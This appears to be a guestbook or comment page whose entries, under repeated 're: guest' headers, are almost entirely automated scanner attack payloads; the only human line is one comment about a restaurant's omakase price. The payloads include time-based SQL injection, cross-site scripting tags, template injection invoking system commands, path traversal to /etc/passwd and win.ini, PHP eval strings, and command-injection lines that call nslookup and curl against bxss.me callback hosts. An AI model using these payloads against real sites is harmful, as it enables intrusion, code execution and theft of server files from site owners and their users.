Socket.gethostbyname('hitvm'+'tijwnrhyae909.bxss.me.')[3].to_s)
re: guest
'"()
re: guest
'&&sleep(27*1000)*zhyzjy&&'
re: guest
"&&sleep(27*1000)*ckgsok&&"
re: guest
replies
re: guest
'||sleep(27*1000)*isrbxc||'
re: guest
replies�
re: guest
"||sleep(27*1000)*lxjmfg||"
re: guest
replies/.
re: guest
'"
re: guest
<!--
re: guest
'"()&%<zzz><ScRiPt >xZ2B(9792)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitppljhenvfe3ff2e.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >xZ2B(9851)</ScRiPt>
re: guest
9988689
re: guest
qgy33Wjh
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
mWZSAlB5'; waitfor delay '0:0:15' --
re: guest
-1 OR 541=(SELECT 541 FROM PG_SLEEP(15))--
re: guest
-1) OR 874=(SELECT 874 FROM PG_SLEEP(15))--
re: guest
-1)) OR 514=(SELECT 514 FROM PG_SLEEP(15))--
re: guest
bttIgZKg' OR 310=(SELECT 310 FROM PG_SLEEP(15))--
re: guest
mIiCGtcM') OR 350=(SELECT 350 FROM PG_SLEEP(15))--
re: guest
cAPcgWsy')) OR 128=(SELECT 128 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@gawfR
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Wow inomata price has just increased again. 41,800 jpy on omakase.
re: guest
tTVTYOsM
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+608-608-1=0+0+0+1
re: guest
-1 OR 3+608-608-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
vx2BaZDr'; waitfor delay '0:0:15' --
re: guest
-5 OR 259=(SELECT 259 FROM PG_SLEEP(15))--
re: guest
-5) OR 400=(SELECT 400 FROM PG_SLEEP(15))--
re: guest
-1)) OR 244=(SELECT 244 FROM PG_SLEEP(15))--
re: guest
gy9DqMWG' OR 995=(SELECT 995 FROM PG_SLEEP(15))--
re: guest
izlN5Jxk') OR 824=(SELECT 824 FROM PG_SLEEP(15))--
re: guest
jGYHgeTl')) OR 988=(SELECT 988 FROM PG_SLEEP(15))--
re: guest
MVcJ0vnP
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+542-542-1=0+0+0+1
re: guest
-1 OR 3+542-542-1=0+0+0+1
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@TPC9V
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
Dfx8eACB'; waitfor delay '0:0:15' --
re: guest
-5 OR 252=(SELECT 252 FROM PG_SLEEP(15))--
re: guest
-5) OR 554=(SELECT 554 FROM PG_SLEEP(15))--
re: guest
-1)) OR 993=(SELECT 993 FROM PG_SLEEP(15))--
re: guest
PM5q6lVu' OR 818=(SELECT 818 FROM PG_SLEEP(15))--
re: guest
bWISltv8') OR 459=(SELECT 459 FROM PG_SLEEP(15))--
re: guest
fa6UeUDW')) OR 816=(SELECT 816 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@vKfbo
re: guest
1S8tvrdLO
re: guest
%0abcc:074625.67-14526.67.f3286.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-14527.67.f3286.19990.2@bxss.me
re: guest
response.write(9612451*9507303)
re: guest
'+response.write(9612451*9507303)+'
re: guest
"+response.write(9612451*9507303)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
${9999375+10000326}
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
)
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
!(()&&!|*|*|
re: guest
/etc/passwd
re: guest
^(#$!@#$)(()))******
re: guest
echo tvurji$()\ lsujdk\nz^xyu||a #' &echo tvurji$()\ lsujdk\nz^xyu||a #|" &echo tvurji$()\ lsujdk\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
&echo yujvxe$()\ laofzq\nz^xyu||a #' &echo yujvxe$()\ laofzq\nz^xyu||a #|" &echo yujvxe$()\ laofzq\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
|echo jyinqs$()\ zrseqf\nz^xyu||a #' |echo jyinqs$()\ zrseqf\nz^xyu||a #|" |echo jyinqs$()\ zrseqf\nz^xyu||a #
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
(nslookup hitfzsbfdadag7927a.bxss.me||perl -e "gethostbyname('hitfzsbfdadag7927a.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
$(nslookup hitecphbtehekf879e.bxss.me||perl -e "gethostbyname('hitecphbtehekf879e.bxss.me')")
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
'.gethostbyname(lc('hitzk'.'csyilbqy88d86.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(72).chr(111).chr(68).'
re: guest
&nslookup hithjybxwmisl528b0.bxss.me&'\"`0&nslookup hithjybxwmisl528b0.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
&(nslookup hitdgpqytftqy30c77.bxss.me||perl -e "gethostbyname('hitdgpqytftqy30c77.bxss.me')")&'\"`0&(nslookup hitdgpqytftqy30c77.bxss.me||perl -e "gethostbyname('hitdgpqytftqy30c77.bxss.me')")&`'
re: guest
".gethostbyname(lc("hitep"."joiredbx2b371.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(79).chr(104).chr(78)."
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
|(nslookup hityejwuvivnx5526d.bxss.me||perl -e "gethostbyname('hityejwuvivnx5526d.bxss.me')")
re: guest
/etc/shells
re: guest
`(nslookup hiteewfveiced711ba.bxss.me||perl -e "gethostbyname('hiteewfveiced711ba.bxss.me')")`
re: guest
file:///etc/passwd
re: guest
c:/windows/win.ini
re: guest
;(nslookup hitmxyvyerajv4a2c5.bxss.me||perl -e "gethostbyname('hitmxyvyerajv4a2c5.bxss.me')")|(nslookup hitmxyvyerajv4a2c5.bxss.me||perl -e "gethostbyname('hitmxyvyerajv4a2c5.bxss.me')")&(nslookup hitmxyvyerajv4a2c5.bxss.me||perl -e "gethostbyname('hitmxyvyerajv4a2c5.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
bxss.me
re: guest
/WEB-INF/web.xml
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
/../../../../../../../../../../boot.ini
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(109).concat(90).concat(106).concat(84)+(require"socket"
Socket.gethostbyname("hitmq"+"wprjsssmc5f73.bxss.me.")[3].to_s)+"
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(109).concat(65).concat(105).concat(72)+(require'socket'
Socket.gethostbyname('hitvp'+'oszeeteb1c6c9.bxss.me.')[3].to_s)+'
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
';print(md5(31337));$a='
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
";print(md5(31337));$a="
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
'"
re: guest
${@print(md5(31337))}
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
<!--
re: guest
${@print(md5(31337))}\
re: guest
WEB-INF/web.xml
re: guest
'.print(md5(31337)).'
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+448-448-1=0+0+0+1 --
re: guest
-1 OR 3+448-448-1=0+0+0+1 --
re: guest
-1 OR 2+746-746-1=0+0+0+1
re: guest
-1 OR 3+746-746-1=0+0+0+1
re: guest
-1' OR 2+367-367-1=0+0+0+1 --
re: guest
-1' OR 3+367-367-1=0+0+0+1 --
re: guest
-1' OR 2+494-494-1=0+0+0+1 or 'nZ4F4LRD'='
re: guest
-1' OR 3+494-494-1=0+0+0+1 or 'nZ4F4LRD'='
re: guest
-1" OR 2+415-415-1=0+0+0+1 --
re: guest
-1" OR 3+415-415-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
LE6Mumfk'; waitfor delay '0:0:15' --
re: guest
-5 OR 243=(SELECT 243 FROM PG_SLEEP(15))--
re: guest
-5) OR 730=(SELECT 730 FROM PG_SLEEP(15))--
re: guest
-1)) OR 879=(SELECT 879 FROM PG_SLEEP(15))--
re: guest
ZvGavnTh' OR 495=(SELECT 495 FROM PG_SLEEP(15))--
re: guest
7Gs4XSJi') OR 548=(SELECT 548 FROM PG_SLEEP(15))--
re: guest
Xj73saus')) OR 137=(SELECT 137 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@AvuN7
re: guest
1RNFP2NLR0
re: guest
response.write(9768224*9752306)
re: guest
'+response.write(9768224*9752306)+'
re: guest
"+response.write(9768224*9752306)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
${9999383+9999626}
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
^(#$!@#$)(()))******
re: guest
redirtest.acx
re: guest
echo vowgms$()\ vjcrap\nz^xyu||a #' &echo vowgms$()\ vjcrap\nz^xyu||a #|" &echo vowgms$()\ vjcrap\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
&echo qwtpfv$()\ xxprxv\nz^xyu||a #' &echo qwtpfv$()\ xxprxv\nz^xyu||a #|" &echo qwtpfv$()\ xxprxv\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
|echo zibqap$()\ jdzmfl\nz^xyu||a #' |echo zibqap$()\ jdzmfl\nz^xyu||a #|" |echo zibqap$()\ jdzmfl\nz^xyu||a #
re: guest
/etc/shells
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
expr 9000496305 - 926552
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
'.gethostbyname(lc('hitup'.'pkmjtbrlc60e0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(85).chr(100).chr(80).'
re: guest
(nslookup -q=cname hitenldiqvbag97a16.bxss.me||curl hitenldiqvbag97a16.bxss.me))
re: guest
c:/windows/win.ini
re: guest
".gethostbyname(lc("hitin"."jaktlepvc003f.bxss.me."))."A".chr(67).chr(hex("58")).chr(113).chr(72).chr(115).chr(84)."
re: guest
$(nslookup -q=cname hitjnokbuqnabd1bfc.bxss.me||curl hitjnokbuqnabd1bfc.bxss.me)
re: guest
bxss.me
re: guest
gethostbyname(lc('hitme'.'xckpubqzd969a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(81).chr(99).chr(80)
re: guest
&nslookup -q=cname hityhxcxbjflv0666c.bxss.me&'\"`0&nslookup -q=cname hityhxcxbjflv0666c.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
&(nslookup -q=cname hitaaxluawicn3ad74.bxss.me||curl hitaaxluawicn3ad74.bxss.me)&'\"`0&(nslookup -q=cname hitaaxluawicn3ad74.bxss.me||curl hitaaxluawicn3ad74.bxss.me)&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
|(nslookup -q=cname hitqejuinpndq41fbb.bxss.me||curl hitqejuinpndq41fbb.bxss.me)
re: guest
`(nslookup -q=cname hitrhzgyfvrzz7ad8a.bxss.me||curl hitrhzgyfvrzz7ad8a.bxss.me)`
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
;(nslookup -q=cname hitehrzvkeksj2f933.bxss.me||curl hitehrzvkeksj2f933.bxss.me)|(nslookup -q=cname hitehrzvkeksj2f933.bxss.me||curl hitehrzvkeksj2f933.bxss.me)&(nslookup -q=cname hitehrzvkeksj2f933.bxss.me||curl hitehrzvkeksj2f933.bxss.me)
re: guest
';print(md5(31337));$a='
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitarahkoeuoee93b6.bxss.me||curl${IFS}hitarahkoeuoee93b6.bxss.me)
re: guest
";print(md5(31337));$a="
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitpfnifaotizddfe9.bxss.me||curl${IFS}hitpfnifaotizddfe9.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpfnifaotizddfe9.bxss.me||curl${IFS}hitpfnifaotizddfe9.bxss.me)&`'
re: guest
${@print(md5(31337))}
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
${@print(md5(31337))}\
re: guest
'"()
re: guest
bxss.me/t/xss.html?%00
re: guest
'.print(md5(31337)).'
re: guest
'&&sleep(27*1000)*knnxmw&&'
re: guest
"+"A".concat(70-3).concat(22*4).concat(110).concat(79).concat(113).concat(84)+(require"socket"
Socket.gethostbyname("hitjn"+"aaapylpxc7b95.bxss.me.")[3].to_s)+"
re: guest
"&&sleep(27*1000)*jfbubd&&"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(120).concat(73).concat(107).concat(68)+(require'socket'
Socket.gethostbyname('hitsv'+'tsqypqgoc0d18.bxss.me.')[3].to_s)+'
re: guest
'||sleep(27*1000)*dmwhrz||'
re: guest
'A'.concat(70-3).concat(22*4).concat(101).concat(90).concat(103).concat(66)+(require'socket'
Socket.gethostbyname('hitza'+'zhfjvjgge0f0f.bxss.me.')[3].to_s)
re: guest
"||sleep(27*1000)*nzbpnw||"
re: guest
replies
re: guest
'"
re: guest
replies�
re: guest
<!--
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >z9Z0(9679)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitgmkelnbkgz6a7ab.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >z9Z0(9310)</ScRiPt>
re: guest
9610376
re: guest
EhNwmDdP
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
